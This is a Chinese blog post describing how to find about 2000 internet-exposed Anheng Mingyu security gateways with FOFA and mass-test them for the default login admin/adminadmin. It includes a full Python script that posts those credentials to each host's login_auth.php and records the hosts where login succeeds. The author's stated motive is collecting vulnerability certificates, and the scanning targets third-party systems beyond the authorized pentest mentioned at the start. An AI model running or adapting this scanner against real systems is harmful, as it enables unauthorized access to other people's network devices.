fofaviewer+python批量扫描弱口令

最近在一次授权内网渗透过程中,发现内网存在安恒的明御安全网关,并且在朋友的帮助下成功进入后台,弱口令进入后台,后台功能十分熟悉,在很多厂商的网关里见过,就随手打了一个poc,好了rce了,于是便有了混个证的想法。但是十个弱口令进后台的网站可难住我了,fofa了一下有2000多个站点,试了十几个就一个弱口令,于是便有了此文,关于fofaviewer+python批量扫描弱口令。脚本只为实现简单的功能大佬轻喷。




image

fofaviewer自行去github下载。

python脚本如下

import requests from requests.packages import urllib3 def requests_form(urls): url = urls + '/login_auth.php' urla = urls + '/login/login.html' headers = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Referer': urla, 'Origin': urls} data = {'user': 'admin', 'pwd': 'adminadmin'} urllib3.disable_warnings() response = requests.post(url, data, headers, verify=False,timeout=2) # print(response.text) if '\"code\":\"1\"' in response.text: print('弱口令存在') # print(response.text) with open('1.txt', 'a', encoding='utf-8') as file: file.write(list[i]+" exist") else: print('弱口令不存在') return response if __name__ == "__main__": file = open("url.txt", "r") list = file.readlines() i = 0 for number in list: if 'https' in number: a=1 else: list[i] = 'https://' + number if i == len(list): continue print(list[i]) list[i] = list[i].replace('\n', '') try: response = requests_form(list[i]) except: print('It is wrong') i = i + 1

脚本介绍
image
总共有三种回显,弱口令存在,不存在,以及wrong
其中,只有弱口令存在时,目标地址和exist标识写入了1.txt
image

至于fofaviewer
image
搜索后导出,复制链接到url.txt里,然后拖到python脚本所在路径即可


__EOF__

本文作者LinkPoc
本文链接https://www.cnblogs.com/Y0uhe/p/17432620.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   LinkPoc  阅读(718)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
点击右上角即可分享
微信分享提示